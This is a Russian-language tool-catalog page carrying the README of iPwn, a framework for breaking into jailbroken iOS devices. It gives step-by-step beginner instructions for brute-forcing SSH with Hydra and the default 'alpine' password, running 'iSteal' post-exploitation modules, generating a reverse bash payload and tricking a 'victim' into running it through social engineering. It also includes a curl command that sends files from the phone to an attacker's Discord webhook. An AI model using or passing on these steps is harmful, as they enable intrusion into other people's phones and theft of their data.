Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
iPwn — Фреймворк, предназначенный для эксплуатации iOS-устройств. | Kitploit
Инструменты/GitHubGitHub/brows3r/ipwn
Безопасность iOSАтаки на ПаролиГенерация полезной нагрузкиЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеМобильная безопасностьИнструмент Удаленного Доступа
GitHubbrows3r/ipwn

iPwn

Фреймворк, предназначенный для эксплуатации iOS-устройств.

Репозиторий
233365 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

iPwn

Фреймворк, предназначенный для эксплуатации iOS-устройств. image

<!> ЗАПОМНИТЕ: iPhone, к которому вы пытаетесь получить доступ с помощью этого инструмента, должен быть джейлбрейкнут <!>

Статус - ❌

Этот проект всё ещё в разработке. Я добавляю новые расширения и опции для пост-эксплуатации для сбора информации об устройстве и других вещей. Также я работаю над способом внедрения полезной нагрузки в обычный iOS-твик, чтобы получение обратной оболочки было проще.

Журнал обновлений

[6/2/21] - Добавлено дополнительное меню для людей, у которых устройства подключены к компьютеру и которые хотят с ними поэкспериментировать. Вскоре будет добавлено больше.

[6/2/21] - Добавлено 4 дополнительных модуля для инструмента пост-эксплуатации 'iSteal'. Также добавлена опция для установки джейлбрейка checkra1n.

[5/25/21] - Добавлено 8 дополнительных модулей для инструмента пост-эксплуатации 'iSteal'.

[5/25/21] - Добавлено 2 дополнительных модуля для инструмента пост-эксплуатации 'iSteal'.

Описание/Как использовать [ДЛЯ НОВИЧКОВ!!!]

iPwn — это фреймворк, предназначенный для эксплуатации и получения доступа к iOS-устройствам. Также у него есть расширение, представляющее собой мини-фреймворк под названием 'iSteal', который предназначен для пост-эксплуатации (после получения доступа к устройству). Это описание проведёт вас через различные способы и шаги для получения доступа к iOS-устройству и сбора информации с него.

Первый способ получения доступа к iOS-устройству. — SSH-брутфорс.

Большинство джейлбрейкнутых iOS-устройств с Cydia поставляются с предустановленным OpenSSH. И обычно учётные данные очень слабые или распространённые, один из самых распространённых паролей будет включён в словарь, который должен быть в вашей папке, если вы скачали iPwn с моего Github.

Итак, начнём! Сначала запустим скрипт.

root@kitploit:~
python main.py

Затем введём команду 'brute'. (Если хотите ввести help и ознакомиться с командами, можете это сделать.) image

После ввода команды 'brute' введите 'help', чтобы отобразить все доступные команды. image Теперь мы будем использовать команду 'default', чтобы начать SSH-брутфорс со словарём, содержащим самые распространённые пароли. Вас попросят ввести IP-адрес цели. Убедитесь, что вы вводите правильный и действительный адрес, нажмите Enter и переходите к следующему шагу. image

<!> ЕСЛИ У ВАС ВОЗНИКАЮТ ОШИБКИ, УБЕДИТЕСЬ, ЧТО HYDRA УСТАНОВЛЕН. ВЫ МОЖЕТЕ УСТАНОВИТЬ HYDRA С ПОМОЩЬЮ КОМАНД НИЖЕ <!>

root@kitploit:~
команды для установки hydra:

sudo apt install hydra
sudo pacman -S hydra

Теперь вернёмся к руководству. Если у вас установлен hydra на вашем ПК, он уже должен пытаться выполнить брутфорс. Просто подождите около 20–40 секунд, и если устройство использует стандартные/распространённые учётные данные из словаря, то Hydra должна выдать небольшое сообщение с правильным паролем. image

Как видим, правильный пароль — 'alpine'. Теперь мы можем войти в телефон, выполнив 'ssh root@ip_адрес' в другом окне терминала. Когда появится запрос пароля, просто введите пароль, полученный от Hydra. image

Теперь мы вошли!

image

На этом этапе мы, вероятно, захотим собрать некоторую информацию о телефоне и управлять им, но это будет позже. Сначала нужно установить несколько очень важных вещей. Если вы хотите использовать SCP для передачи файла настройки, который автоматизирует всё, можете это сделать. Файл находится в /post-exploitation/post.sh. После передачи файла 'post.sh' на iOS-устройство выполните его, введя 'bash post.sh', и он начнёт установку и настройку инструментов пост-эксплуатации, которые мы будем использовать.

<!> ПРИМЕЧАНИЕ: КОМАНДЫ НИЖЕ ПРЕДНАЗНАЧЕНЫ ТОЛЬКО ДЛЯ ТЕХ, КТО ХОЧЕТ УСТАНОВИТЬ НЕОБХОДИМЫЕ ПАКЕТЫ И ИНСТРУМЕНТЫ ВРУЧНУЮ <!>

root@kitploit:~
выполните все эти команды, чтобы установить/настроить всё необходимое:

apt install netcat
apt install python3
apt install nano
git clone https://github.com/0x1CA3/iSteal.git

Итак, теперь, когда всё установлено, мы можем зайти в папку 'iSteal' и запустить скрипт пост-эксплуатации 'iSteal'.

root@kitploit:~
python3 post.py

<!> ПРИМЕЧАНИЕ: При запуске файлов python убедитесь, что вы используете "python3", а не "python" или "py" <!>

Итак, скрипт должен загрузиться. Если хотите воспользоваться командой 'help' и осмотреться, можете это сделать. image

Теперь мы будем использовать команду 'list', чтобы показать доступные модули/опции для пост-эксплуатации. image

<!> ИМЕЙТЕ В ВИДУ: СКРИПТ ПОСТ-ЭКСПЛУАТАЦИИ БУДЕТ ЧАСТО ОБНОВЛЯТЬСЯ, И БУДУТ ДОБАВЛЯТЬСЯ НОВЫЕ МОДУЛИ, ПОЭТОМУ ЭТО ИЗОБРАЖЕНИЕ БУДЕТ ОБНОВЛЕНО ДЛЯ ТОЧНОСТИ <!>

Чтобы использовать модуль, просто введите 'use конкретный/модуль'. Пример: use modules/list_installed_default_apps

И как видите, при запуске этого модуля он показывает установленные приложения по умолчанию на целевом iOS-устройстве. image

Второй способ получения доступа к iOS-устройству. — Обратная оболочка.

Теперь я покажу, как сделать это вторым способом, который немного сложнее. Имейте в виду, я не буду включать скриншоты для этой части.

root@kitploit:~
запустите фреймворк iPwn, выполнив 'python main.py'
введите команду 'payload'
дождитесь загрузки фабрики полезных нагрузок.
выберите полезную нагрузку по вашему выбору, Пример: use payloads/factory/reverse_bash
введите свой IP
введите свой порт
затем вы должны получить сообщение 'payload generated'
введите команду 'back', чтобы вернуться в главное меню
введите команду 'listen', чтобы начать прослушивание входящих соединений
убедитесь, что ваша жертва запускает скрипт через терминал или своим способом, используйте социальную инженерию, проявляйте креативность!
после выполнения скрипта на iOS-устройстве жертвы вы должны получить соединение
установите важные пакеты, передав файл 'post.sh' из /post-exploitation и выполнив его, или сделайте это вручную.
теперь вы можете запустить инструменты пост-эксплуатации 'iSteal' или 'AutoEnum'
веселитесь! :)

<!> Если вы выполняете шаг 2 и застряли на этапе установки важных пакетов/инструментов, перейдите к шагу 1 и скопируйте инструкцию по установке пакетов/инструментов! <!>

Передача/Извлечение файлов

Существует несколько способов передачи файлов на iOS-устройство и много способов их скачивания. Самый лёгкий способ извлечь и скачать файлы с iOS-устройства — использовать Curl и Discord вебхук.

<!> ПРИМЕЧАНИЕ: Ниже показано, как извлекать и скачивать файлы с iOS-устройства с помощью curl <!>

root@kitploit:~
Шаг 1: Создайте Discord сервер
Шаг 2: Создайте вебхук и скопируйте ссылку
Шаг 3: На iOS-устройстве перейдите в директорию, содержащую файл, который вы хотите получить.
Шаг 4: Введите команду ниже (замените file_here.txt на имя вашего файла, замените webhook_url_here на URL вашего вебхука)

curl -i -H 'Expect: application/json' -F file=@file_here.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' webhook_url_here

Шаг 5: Подождите около 10–50 секунд
Готово! Файл должен быть загружен на ваш Discord сервер. Теперь вы можете скачать/просмотреть файл.

Протестированные ОС

root@kitploit:~
Windows 10 — Стабильно
Garuda Linux — Стабильно
Arch-based дистрибутивы — Стабильно

Поддерживаемые и протестированные iOS-устройства

root@kitploit:~
Поддерживаемые устройства [Расширение пост-эксплуатации должно работать на всех этих]
-----------------
iPods новее 4-го поколения iPod
iPhone 4
iPhone 4S
iPhone 5
iPhone 6
iPhone SE
iPhone 7
iPhone 7+
iPhone 8
iPhone 8+
iPhone X
iPhone XR
iPhone XS
iPhone 11
iPhone 12

Мои собственные протестированные устройства [Те, которые я лично тестировал]
---------------------
iPhone 4S
iPhone 5S
iPhone SE
iPhone 7+
iPad Air
iPod 4-го поколения

Скриншоты

image image image image

Благодарности

[https://github.com/0x1CA3]

Скачать инструмент